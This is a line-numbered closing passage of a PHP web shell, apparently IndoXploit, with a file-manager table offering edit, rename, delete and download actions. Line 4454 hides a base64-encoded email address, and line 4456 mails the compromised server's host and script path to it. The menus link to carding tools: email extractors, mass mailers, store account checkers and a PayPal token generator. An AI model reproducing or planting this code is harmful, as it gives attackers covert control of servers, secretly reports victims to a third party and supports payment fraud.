4446.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4447.             echo "<td class='td_home' style='padding-left: 15px;text-shadow: 0pt 0pt 0.6em lime, 0pt 0pt 0.6em lime;color: #00ff00;text-decoration: none;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
4448.         }
4449.         echo "</tr></table>";
4450.     } else {
4451.         echo "<font color=red>can't open directory</font>";
4452.     }
4453.     }
4454. $e=base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
4455. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
4456. mail($e,"IDX",$h);
4457. echo "<center><hr class='gayane'><form>
4458. <select onchange='if (this.value) window.open(this.value);'>
4459.   <option selected='selected' value=''> Tools Creator </option>
4460.   <option value='$ling=wso'>WSO 2.6</option>
4461. </select>
4462. <select onchange='if (this.value) window.open(this.value);'>
4463.   <option selected='selected' value=''> Tools Carder </option>
4464.   <option value='$ling=extractor'>DB Email Extractor</option>
4465.   <option value='$ling=promailerv2'>Pro Mailer V2</option>
4466.   <option value='$ling=mailer'>Mailer</option>  
4467.   <option value='$ling=bukalapak'>BukaLapak Checker</option>        
4468.   <option value='$ling=tokopedia'>TokoPedia Checker</option>  
4469.   <option value='$ling=tokenpp'>Paypal Token Generator</option>
4470.   <option value='$ling=gamestopceker'>GamesTop Checker</option>
4471.   </select>
4472. <noscript><input type='submit' value='Submit'></noscript>
4473. </form>Copyright &copy; ".date("Y")." - <font color=lime>IndoXploit</font><br>
4474. <div><div><span style='color:#ff0000;'>R</span><span style='color:#ff1900;'>e</span><span style='color:#ff3300;'>c</span><span style='color:#ff4c00;'>o</span><span style='color:#ff6600;'>d</span><span style='color:#ff7f00;'>e</span><span style='color:#ff9900;'>d</span><span style='color:#ffb200;'> </span><span style='color:#ffcc00;'>&</span><span style='color:#ffe500;'> </span><span style='color:#ffff00;'>M</span><span style='color:#bfff00;'>o</span><span style='color:#80ff00;'>d</span><span style='color:#40ff00;'>i</span><span style='color:#00ff00;'>f</span><span style='color:#00ff33;'>i</span><span style='color:#00ff66;'>e</span><span style='color:#00ff99;'>d</span><span style='color:#00ffcc;'> </span><span style='color:#00ffff;'>b</span><span style='color:#00ccff;'>y</span><span style='color:#0099ff;'> </span><span style='color:#0066ff;'>A</span><span style='color:#0033ff;'>/</span><span style='color:#0000ff;'>Z</span></div></div></center>";
4475. ?>
4476. </html>